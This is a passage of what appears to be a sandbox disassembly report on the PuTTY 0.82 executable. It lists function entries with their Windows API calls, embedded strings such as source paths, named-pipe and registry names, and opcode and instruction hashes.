                                                          • Opcode Fuzzy Hash: 908287c952c19077702fa72e75881eff9a37e9d8844351ad772059503a0a4c29
                                                          • Instruction Fuzzy Hash: 83A12833E09BA586E7249A15E48077EF3E1F784741F524035D98E83B94EFBEE800AB14
                                                          APIs
                                                          Similarity
                                                          • API ID: Color$ModeObjectSelectText
                                                          • String ID:
                                                          • API String ID: 3594386986-0
                                                          • Opcode ID: 1388d1588876b3c84cfd86371b46ce0b701140e2fef23bf9d90feba35a8186a3
                                                          • Instruction ID: 857c956391e6f0fac3a166e299a8f88beaec9150826f24cc721080a7282b7320
                                                          • Opcode Fuzzy Hash: 1388d1588876b3c84cfd86371b46ce0b701140e2fef23bf9d90feba35a8186a3
                                                          • Instruction Fuzzy Hash: 1F912933E09BA586E7249A15E48077EF3E1F784741F524035D98D83B94EFBEE800AB14
                                                          APIs
                                                          Similarity
                                                          • API ID: Color$ModeObjectSelectText
                                                          • String ID:
                                                          • API String ID: 3594386986-0
                                                          • Opcode ID: 7f041fe45775f78923f1fea1f2459b20f4022d21d3e22c60ad8540e4319e1bac
                                                          • Instruction ID: 2db60d6fe3934d7affcc3e68fcb5aff9a1cf4c01816874f2d4d12ca3b4c85131
                                                          • Opcode Fuzzy Hash: 7f041fe45775f78923f1fea1f2459b20f4022d21d3e22c60ad8540e4319e1bac
                                                          • Instruction Fuzzy Hash: 53912833E09BA586E7249A15E48077EF3E1F784741F524035D98D83B94EFBEE801AB54
                                                          APIs
                                                          Similarity
                                                          • API ID: HandleInformationIoctlhtonlsocket
                                                          • String ID:
                                                          • API String ID: 8079943-0
                                                          • Opcode ID: 506b895b711262b3b44b3e305ad8d392f31a4dd7883a8d92971d1b63d6712cd2
                                                          • Instruction ID: 231a815d06e0a68add03943f4cee71d1bb8c8e4c6ed12f8b0ae19db13ee1afb1
                                                          • Opcode Fuzzy Hash: 506b895b711262b3b44b3e305ad8d392f31a4dd7883a8d92971d1b63d6712cd2
                                                          • Instruction Fuzzy Hash: D7315863B1970352FB10AB14A894B26E390FF84750F844331EE6D02B94EF3EE8029718
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: GetVersionExA$kernel32.dll
                                                          • API String ID: 190572456-3521452493
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID: GetLocaleInfoEx
                                                          • API String ID: 2299586839-2904428671
                                                          APIs
                                                          Similarity
                                                          • API ID: IconicTextWindow
                                                          • String ID:
                                                          • API String ID: 3799979766-0
                                                          APIs
                                                          Similarity
                                                          • API ID: IconicTextWindow
                                                          • String ID:
                                                          • API String ID: 3799979766-0
                                                          APIs
                                                          Similarity
                                                          • API ID: ContextWindow$CaretCompositionInfoLocaleProcRelease
                                                          • String ID:
                                                          • API String ID: 2999936390-0
                                                          APIs
                                                            • Part of subcall function 00007FF738B019C8: GetLastError.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B019D7
                                                            • Part of subcall function 00007FF738B019C8: FlsGetValue.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B019EC
                                                            • Part of subcall function 00007FF738B019C8: SetLastError.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01A77
                                                          • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF738B08147,00000000,00000092,?,?,00000000,?,?,00007FF738AF7139), ref: 00007FF738B083E2
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystemValue
                                                          • String ID:
                                                          • API String ID: 3029459697-0
                                                          APIs
                                                            • Part of subcall function 00007FF738B019C8: GetLastError.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B019D7
                                                            • Part of subcall function 00007FF738B019C8: FlsGetValue.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B019EC
                                                            • Part of subcall function 00007FF738B019C8: SetLastError.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01A77
                                                          • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF738B08103,00000000,00000092,?,?,00000000,?,?,00007FF738AF7139), ref: 00007FF738B086DE
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystemValue
                                                          • String ID:
                                                          • API String ID: 3029459697-0
                                                          APIs
                                                          • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF738B00BE7,?,?,?,?,?,?,?,?,00000000,00007FF738B07D6C), ref: 00007FF738B0185B
                                                          Similarity
                                                          • API ID: EnumLocalesSystem
                                                          • String ID:
                                                          • API String ID: 2099609381-0
                                                          APIs
                                                          Similarity
                                                          • API ID: AsyncSelectrecv
                                                          • String ID:
                                                          • API String ID: 3881473523-0
                                                          APIs
                                                          Similarity
                                                          • API ID: KeyboardState
                                                          • String ID:
                                                          • API String ID: 1724228437-0
                                                          APIs
                                                          Similarity
                                                          • API ID: Iconic
                                                          • String ID:
                                                          • API String ID: 110040809-0
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: Object$Select$CaretClipCreateDeletePaintPaletteRectStock$BeginBrushExcludeHideIntersectRealizeRectangleShowSolid
                                                          • String ID: !wgs->wintw_hdc$/home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/window.c
                                                          • API String ID: 4109966220-1893345581
                                                          APIs
                                                          • CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF738AD9C8B), ref: 00007FF738AD9B07
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF738AD9C8B), ref: 00007FF738AD9B0F
                                                          • WaitNamedPipeA.KERNEL32 ref: 00007FF738AD9B22
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF738AD9C8B), ref: 00007FF738AD9B29
                                                            • Part of subcall function 00007FF738AFA0EC: _set_error_mode.LIBCMT ref: 00007FF738AFA113
                                                            • Part of subcall function 00007FF738A73820: GetCurrentProcessId.KERNEL32 ref: 00007FF738A73860
                                                            • Part of subcall function 00007FF738A73820: OpenProcess.KERNEL32 ref: 00007FF738A73872
                                                            • Part of subcall function 00007FF738A73820: GetLastError.KERNEL32 ref: 00007FF738A738C3
                                                            • Part of subcall function 00007FF738A73820: LocalAlloc.KERNEL32 ref: 00007FF738A738E8
                                                            • Part of subcall function 00007FF738A73820: GetLengthSid.ADVAPI32 ref: 00007FF738A7391A
                                                            • Part of subcall function 00007FF738A73820: CopySid.ADVAPI32 ref: 00007FF738A7393E
                                                            • Part of subcall function 00007FF738A73820: CloseHandle.KERNEL32 ref: 00007FF738A73964
                                                            • Part of subcall function 00007FF738A73820: CloseHandle.KERNEL32 ref: 00007FF738A73974
                                                            • Part of subcall function 00007FF738A73820: LocalFree.KERNEL32 ref: 00007FF738A73982
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF738AD9C8B), ref: 00007FF738AD9B8E
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF738AD9C8B), ref: 00007FF738AD9B94
                                                            • Part of subcall function 00007FF738A74050: FormatMessageA.KERNEL32(?,?,?,?,?,?,?,00000000,00007FF738A69A4B), ref: 00007FF738A740FB
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF738AD9C8B), ref: 00007FF738AD9BCE
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF738AD9C8B), ref: 00007FF738AD9BD4
                                                          • EqualSid.ADVAPI32(?,?,?,?,?,?,?,?,00000030,00007FF738AD9C8B), ref: 00007FF738AD9C20
                                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF738AD9C8B), ref: 00007FF738AD9C2F
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF738AD9C8B), ref: 00007FF738AD9C3A
                                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000030,00007FF738AD9C8B), ref: 00007FF738AD9C45
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CloseErrorHandleLast$Local$Free$Process$AllocCopyCreateCurrentEqualFileFormatLengthMessageNamedOpenPipeWait_set_error_mode
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/named-pipe-client.c$Error waiting for named pipe '%s': %s$Owner of named pipe '%s' is not us$Unable to get named pipe security information: %s$Unable to get user SID: %s$Unable to open named pipe '%s': %s$\\.\pipe\$strchr(pipename + 9, '\\') == NULL$strncmp(pipename, "\\\\.\\pipe\\", 9) == 0
                                                          • API String ID: 1091246219-3213421229
                                                          • Opcode ID: 03ff6ff310a2032def80096cefde3ec4e2fe4599037a9136210999e613ba9e64
                                                          • Instruction ID: 39c7055b242766e6ef8684a829a3c20d076731a68c019a9c2a68d38ebf52ed65
                                                          • Opcode Fuzzy Hash: 03ff6ff310a2032def80096cefde3ec4e2fe4599037a9136210999e613ba9e64
                                                          • Instruction Fuzzy Hash: E6517F23A1DA43A1FA00BB21A865779E360BF85B90FC44231DD1E437E4DF7EE405A329
                                                          APIs
                                                            • Part of subcall function 00007FF738A72B00: LoadLibraryA.KERNELBASE ref: 00007FF738A72B29
                                                          • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF738A77222), ref: 00007FF738A77308
                                                          • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF738A77222), ref: 00007FF738A7731B
                                                          • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF738A77222), ref: 00007FF738A7732E
                                                          • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF738A77222), ref: 00007FF738A77341
                                                          • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF738A77222), ref: 00007FF738A77354
                                                          • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF738A77222), ref: 00007FF738A77367
                                                          • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF738A77222), ref: 00007FF738A7737A
                                                          • GetProcAddress.KERNEL32(?,?,00000000,00000000,00007FF738A77222), ref: 00007FF738A7738D
                                                          Strings
                                                          Similarity
                                                          • API ID: AddressProc$LibraryLoad
                                                          • String ID: ClosePrinter$EndDocPrinter$EndPagePrinter$EnumPrintersA$OpenPrinterA$StartDocPrinterA$StartPagePrinter$WritePrinter$spoolss.dll$winspool.drv
                                                          • API String ID: 2238633743-2130675966
                                                          • Opcode ID: f25f850b1c7cd987eef54693d8e7f2d9fa2397c46d03ffd31ddd717b1a9debfd
                                                          • Instruction ID: eea1ea145cd82e31c70e03c8f7195a7b20ecb7bfa5dca9b592a234b235a3fe28
                                                          • Opcode Fuzzy Hash: f25f850b1c7cd987eef54693d8e7f2d9fa2397c46d03ffd31ddd717b1a9debfd
                                                          • Instruction Fuzzy Hash: F4310BA6A0DE13A0FA05BB10F8903A5F390AF44781FC05635C85E06660DFBE6945E36E
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: Window$Long$CheckItemMenuZoomed$ClientDesktopInfoMonitorRect_set_error_mode
                                                          • String ID: $($/home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/window.c$IsZoomed(wgs->term_hwnd)
                                                          • API String ID: 4273497163-1076784108
                                                          • Opcode ID: 5d9108e0fa9a898b726c1f67bbb7664b43e7ca14a01aae682c6736eb41e690e6
                                                          • Instruction ID: 154bf4fdb26941722ea6768b7138791a7ee00ba5bd9e4a72ef820c6d48a9225b
                                                          • Opcode Fuzzy Hash: 5d9108e0fa9a898b726c1f67bbb7664b43e7ca14a01aae682c6736eb41e690e6
                                                          • Instruction Fuzzy Hash: 4541D563B0964292EB60AB25F84076AF360FFC9B90F904231DA4D43798DF3EE445D714
                                                          APIs
                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00000000,?,00000000,?,?,00007FF738A73C3A), ref: 00007FF738A736A5
                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00000000,?,00000000,?,?,00007FF738A73C3A), ref: 00007FF738A736D2
                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00000000,?,00000000,?,?,00007FF738A73C3A), ref: 00007FF738A736FF
                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00000000,?,00000000,?,?,00007FF738A73C3A), ref: 00007FF738A7372C
                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00000000,?,00000000,?,?,00007FF738A73C3A), ref: 00007FF738A73759
                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00000000,?,00000000,?,?,00007FF738A73C3A), ref: 00007FF738A73782
                                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00000000,?,00000000,?,?,00007FF738A73C3A), ref: 00007FF738A737A7
                                                          Strings
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: GetSecurityInfo$GetTokenInformation$InitializeSecurityDescriptor$OpenProcessToken$SetEntriesInAclA$SetSecurityDescriptorOwner$SetSecurityInfo$advapi32.dll
                                                          • API String ID: 190572456-1260934078
                                                          • Opcode ID: b3a4325b7f6acce72ba734056146a59321e39b8a6d4f87d21b44b00a88f8f423
                                                          • Instruction ID: 599906b4a7009a38c3a98a1800a1a84d14c054bf07da4dff544f11b89fb9e3a1
                                                          • Opcode Fuzzy Hash: b3a4325b7f6acce72ba734056146a59321e39b8a6d4f87d21b44b00a88f8f423
                                                          • Instruction Fuzzy Hash: E641B7A6A0EB43B0FE55EB64E895738E290BF45744FC50635D40E51A60EF7EA804B33E
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: LocalTimewcsftime
                                                          • String ID: %08zx%*s$ (%zu byte%s omitted)$ (%s)$ on behalf of downstream #%u$#0x%lx, $%02x$%Y-%m-%d %H:%M:%S$%s packet $%s raw data at %s$Incoming$Outgoing$XX$type %d / 0x%02x (%s)
                                                          • API String ID: 2400502282-2889948183
                                                          • Opcode ID: 330590ca725553cc791bbb042739855b99999faf6d0f4cc7d28091b9d64a54db
                                                          • Instruction ID: 3edcec350f82cfe34dd3633627d616b1d53e607fa3375f95b554d2e5e6d33cd2
                                                          • Opcode Fuzzy Hash: 330590ca725553cc791bbb042739855b99999faf6d0f4cc7d28091b9d64a54db
                                                          • Instruction Fuzzy Hash: CBA11AA3A0E687A1EA20AB10E4517B9F3D0AF45785FC41132CE8D07755EF7EE186D329
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: Window$Create$ColorText$ClassCompatibleDeleteExtentFontIndirectInfoParametersPoint32RectRegisterShowSystem
                                                          • String ID: %dx%d$SizeTipClass
                                                          • API String ID: 2854742871-2531271423
                                                          • Opcode ID: 9f7ef97a4dc203c239ff9e7297de1ab2d18e6c25262c31996300e102c0bc0f55
                                                          • Instruction ID: 190bed461715bcc648415b89c31953ad48a7b67a47f7f820bc0991710825a4ed
                                                          • Opcode Fuzzy Hash: 9f7ef97a4dc203c239ff9e7297de1ab2d18e6c25262c31996300e102c0bc0f55
                                                          • Instruction Fuzzy Hash: FD518673A0878396EB50AB11F8547AAF760FB89740F904236D98D43B64DF3DE884D715
                                                          APIs
                                                          Similarity
                                                          • API ID: Object$SelectText$ColorPaintWindow$BeginBrushClientCreateDeleteLengthRectRectangleSolidStock
                                                          • String ID:
                                                          • API String ID: 3492845075-0
                                                          • Opcode ID: 6ae3bfd5975a3f0efe71ac6aa72c5d3408d39c777c70dc819746f3fa71bd9005
                                                          • Instruction ID: 85af228585f09428c0105b1686762ecff1d703c8d478e943f8052a439540d451
                                                          • Opcode Fuzzy Hash: 6ae3bfd5975a3f0efe71ac6aa72c5d3408d39c777c70dc819746f3fa71bd9005
                                                          • Instruction Fuzzy Hash: E93172A6B095039BDA44EB12F85463AE761FB8ABD1F804131DD0E03B68DE3EE8459B15
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: CommState
                                                          • String ID: Configuring %s$Configuring %s flow control$Configuring %s parity$Configuring %u data bits$Configuring baud rate %lu$Configuring serial port: %s$Configuring serial timeouts: %s$Invalid number of stop bits (need 1, 1.5 or 2)
                                                          • API String ID: 4071006776-1037083001
                                                          • Opcode ID: a3c2e508619e9dfd4fb88e62e2991e3b6141950d6d84390ff33067a4bd6ddaf9
                                                          • Instruction ID: 530f10f589fbfca2fd4d2f74bb606a2d67aa270d7103cff007ae9507c9906a70
                                                          • Opcode Fuzzy Hash: a3c2e508619e9dfd4fb88e62e2991e3b6141950d6d84390ff33067a4bd6ddaf9
                                                          • Instruction Fuzzy Hash: 6841B363B0E543A2FA10FB25D85157AE320EF85B80FC04131DA0D47B99EE7EE501E729
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: Window$Long$DialogEnableItemText$ActiveExecuteParamShell
                                                          • String ID: %s%s%s%s$About %s$Release 0.82$https://www.chiark.greenend.org.uk/~sgtatham/putty/$open
                                                          • API String ID: 2657381607-1769109111
                                                          • Opcode ID: 5af1c287d6d2a9ed138b76be021ae021362be9dd0e30a429d3d204598e0d91e1
                                                          • Instruction ID: f1f59b576c6d5e3c8e050e78c4d859c18111e3bb5bbbea11703ef7421aca240a
                                                          • Opcode Fuzzy Hash: 5af1c287d6d2a9ed138b76be021ae021362be9dd0e30a429d3d204598e0d91e1
                                                          • Instruction Fuzzy Hash: A531B562A0D50361FA10B711E9507B9D352AF95BC0FC44232D84D07B95CFBEA58AA32A
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Similarity
                                                          • API ID: Mutex$CloseFreeHandleLocalNameReleaseUser$AddressCreateErrorLastObjectProcSingleWait
                                                          • String ID: %s.%s.%s$%s: %s$*logtext || *ds_err || *us_err$/home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/sharing.c$Local\putty-connshare-mutex$Unable to call CryptProtectMemory: %s$\\.\pipe\putty-connshare
                                                          Similarity
                                                          • API ID: LocalTimewcsftime
                                                          • String ID: %Y.%m.%d %H:%M:%S$%s session log (%s mode) to file: %s$/home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/logging.c$=~=~=~=~=~=~=~=~=~=~=~= PuTTY log %s =~=~=~=~=~=~=~=~=~=~=~=$Appending$Disabled writing$Error writing$SSH raw data$Writing new$ctx->state != L_OPENING$unknown
                                                          Similarity
                                                          • API ID: CountTick$Beep$CursorMessageShow
                                                          • String ID: $%s Sound Error$Unable to play sound file%sUsing default sound instead
                                                          Similarity
                                                          • API ID: htonl$ErrorLastgetaddrinfogethostbynameinet_addr
                                                          • String ID: Host does not exist$Host not found$Network is down
                                                          APIs
                                                            • Part of subcall function 00007FF738A72CE0: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DAD
                                                            • Part of subcall function 00007FF738A72CE0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DF6
                                                            • Part of subcall function 00007FF738A730C0: RegSetValueExA.ADVAPI32 ref: 00007FF738A730F3
                                                            • Part of subcall function 00007FF738A72F70: RegSetValueExA.ADVAPI32(?,?,?,?,?,?,00000000,00007FF738A695ED), ref: 00007FF738A72FA4
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FF738A5F0A1), ref: 00007FF738A69618
                                                          Similarity
                                                          • API ID: CloseValue$Create
                                                          • String ID: CA record must have a name$PermitRSASHA1$PermitRSASHA256$PermitRSASHA512$PublicKey$Software\SimonTatham\PuTTY\SshHostCAs$Unable to create registry keyHKEY_CURRENT_USER\%s\%s$Validity
                                                          Similarity
                                                          • API ID: CurrentProcessStatusThreadTimes$CaptureClipboardCursorForegroundGlobalMemoryOwnerQueueWindow
                                                          Similarity
                                                          • API ID: CreateFileInstanceModuleName_invalid_parameter_noinfo
                                                          • String ID: %.*s%s$/home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/jump-list.c$Connect to PuTTY session '$Pageant.exe$Run %.*s$appname
                                                          Similarity
                                                          • API ID: ConsoleFileHandleTypeWriteswprintf
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/utils/memory.c$Assertion failed: %Ts, file %Ts, line %d$Microsoft Visual C++ Runtime Library$extralen <= maxsize - oldlen
                                                          APIs
                                                            • Part of subcall function 00007FF738A72CE0: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DAD
                                                            • Part of subcall function 00007FF738A72CE0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DF6
                                                            • Part of subcall function 00007FF738A72FD0: RegQueryValueExA.ADVAPI32(?,?,?,?,?,00000001,00007FFE21E98EC0,00007FF738A69836), ref: 00007FF738A7300D
                                                            • Part of subcall function 00007FF738A72FD0: RegQueryValueExA.ADVAPI32 ref: 00007FF738A73054
                                                          • RegCloseKey.ADVAPI32(?), ref: 00007FF738A694BF
                                                            • Part of subcall function 00007FF738A73110: RegQueryValueExA.ADVAPI32(?,?,?,?,?,00000000,00000000,?,00007FF738A69B73), ref: 00007FF738A7314B
                                                            • Part of subcall function 00007FF738A73110: RegQueryValueExA.ADVAPI32 ref: 00007FF738A73190
                                                          Similarity
                                                          • API ID: QueryValue$Close$Create
                                                          • String ID: MatchHosts$PermitRSASHA1$PermitRSASHA256$PermitRSASHA512$PublicKey$Software\SimonTatham\PuTTY\SshHostCAs$Validity
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,00000000,?,00007FF738B011D0,?,?,00000000,00007FF738B050F0,?,?,00000003,00007FF738AF6BBD), ref: 00007FF738B01797
                                                          • GetProcAddress.KERNEL32(?,00000000,?,00007FF738B011D0,?,?,00000000,00007FF738B050F0,?,?,00000003,00007FF738AF6BBD), ref: 00007FF738B017A3
                                                          Similarity
                                                          • API ID: AddressFreeLibraryProc
                                                          • String ID: MZx$api-ms-$ext-ms-
                                                          Similarity
                                                          • API ID: ItemText
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$Font: %s, %s%d-%s$Font: %s, %sdefault height$bold, $c && c->ctrl->type == CTRL_FONTSELECT$pixel$point
                                                          • API String ID: 3367045223-2475518631
                                                          • Opcode ID: c3455cc5c028e9244a0aac97f0ef575391ccfc5d2fa450468cf2793a9b67d778
                                                          • Instruction ID: eb99216f3beb3755fb5ee93bdc33d1ad5010af8118e3413f5e8c925cc4ef9928
                                                          • Opcode Fuzzy Hash: c3455cc5c028e9244a0aac97f0ef575391ccfc5d2fa450468cf2793a9b67d778
                                                          • Instruction Fuzzy Hash: A331D663A0AA47A0EA10FB11E885AB9E3A0AF44BD4FC54131DD4D57755DE3EE484E328
                                                          APIs
                                                          Similarity
                                                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                                          • String ID:
                                                          • API String ID: 1330151763-0
                                                          • Opcode ID: 3c798ed775976f38655cf588123b4b726838ba7872b284b3f18423ba7cd36501
                                                          • Instruction ID: 55a4850bf1b52b652504f60f6538467cf0f1ae46f21572caea515e2d4a7e5375
                                                          • Opcode Fuzzy Hash: 3c798ed775976f38655cf588123b4b726838ba7872b284b3f18423ba7cd36501
                                                          • Instruction Fuzzy Hash: 20C10133B28A4296EB10DF64C4906ACB762F749B98B800335DE2E9B3D4CF39E551D315
                                                          APIs
                                                          Similarity
                                                          • API ID: ObjectSelect$DialogExtentMessageModePointRectReleaseSendText
                                                          • String ID:
                                                          • API String ID: 2675881590-0
                                                          • Opcode ID: ae405cb676f9f078d210b7e0febeff7eca22efe9e191549535ece83b230609e1
                                                          • Instruction ID: 8a62ab4c1c1ec414b69d5dafb86d90a745854bc63c9e52451734be493204dad4
                                                          • Opcode Fuzzy Hash: ae405cb676f9f078d210b7e0febeff7eca22efe9e191549535ece83b230609e1
                                                          • Instruction Fuzzy Hash: 6571C873A0E68295EB10AB12B810B7AF7A0FB85BD4F840131EE8D47B59DE3DE444DB14
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: _invalid_parameter_noinfo
                                                          • String ID: 0$f$p$p
                                                          • API String ID: 3215553584-1202675169
                                                          • Opcode ID: 6b212d5627d4d9c2a6e5091e424182c3b23d063288fd341f55745bd8bd3a1932
                                                          • Instruction ID: 37b7f2d54b438e5814dabf72485c47a7e95f22cf90239313f6f67428b99d1276
                                                          • Opcode Fuzzy Hash: 6b212d5627d4d9c2a6e5091e424182c3b23d063288fd341f55745bd8bd3a1932
                                                          • Instruction Fuzzy Hash: C312C333E0F153A6FB207B15D844A79E2A1EB80750FD44133E699476C4DF3EE592AB28
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: CapsChooseDeviceFontRelease
                                                          • String ID: h
                                                          • API String ID: 554219020-2439710439
                                                          • Opcode ID: 6332b23e5dfa65db9a908bb8c96c62a4984fc93d80c1687afe67e996eddfad0b
                                                          • Instruction ID: d2ec0dd63246300813295d260df3cabfbb663be431bcfaaed65add55b63532bd
                                                          • Opcode Fuzzy Hash: 6332b23e5dfa65db9a908bb8c96c62a4984fc93d80c1687afe67e996eddfad0b
                                                          • Instruction Fuzzy Hash: 3071F9B3A0D68699EB60AB21E4147BBF7A0EB45BC4F440235CA8D43B95DF3ED480D715
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                                          • API String ID: 190572456-129414566
                                                          • Opcode ID: 004b206c5471ad85bb02341dd2521e91588945c9d925c7512e4323bad8f4c50c
                                                          • Instruction ID: c666fdf814b018377c20cbf7027592a68d2da845eb09b3811e5b781867bbe24f
                                                          • Opcode Fuzzy Hash: 004b206c5471ad85bb02341dd2521e91588945c9d925c7512e4323bad8f4c50c
                                                          • Instruction Fuzzy Hash: 8C3173B3A0AB03A5FE55FB11E8A0736E360AF84740FC44635D94D46260DF3EE845E62D
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: Cursor$InfoLongMessageMonitorSendShowWindowZoomed
                                                          • String ID: (
                                                          • API String ID: 3620415003-3887548279
                                                          • Opcode ID: 4f22d1259d060ce1cbe66551f1a7515c5ec1e3c1a9dfa2ca336da061deb774b7
                                                          • Instruction ID: 6575654664ad086dd4af8050df6442f764d938442a34803d78e913682988ce8b
                                                          • Opcode Fuzzy Hash: 4f22d1259d060ce1cbe66551f1a7515c5ec1e3c1a9dfa2ca336da061deb774b7
                                                          • Instruction Fuzzy Hash: 4231D863A0E68261FB71AB21E454B7AE391EF84761F840231C95D426C5CF7FE845E325
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: Cursor$InfoLongMessageMonitorSendShowWindowZoomed
                                                          • String ID: (
                                                          • API String ID: 3620415003-3887548279
                                                          • Opcode ID: 356902ac9acca245281dc81259579157d6fbc20153debc6d0c43a44659d8fafa
                                                          • Instruction ID: 96b5d7f88d82c77628da6cb4e203e467c89a4cfbfda730e786cf2fd0045fc69a
                                                          • Opcode Fuzzy Hash: 356902ac9acca245281dc81259579157d6fbc20153debc6d0c43a44659d8fafa
                                                          • Instruction Fuzzy Hash: 2931E863A0E68261FB71AB20E444B7AF391EF89761F840231C95D426D1CF7FE885E325
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: Cursor$InfoLongMessageMonitorSendShowWindowZoomed
                                                          • String ID: (
                                                          • API String ID: 3620415003-3887548279
                                                          • Opcode ID: 684815918d71c28cd1a7cc4a13ab48144d8ef00458f650a35443704f38f6201f
                                                          • Instruction ID: 88316533f174be466011fa30b190fe6af1db56dd947cc5bd7339555dfeb382f0
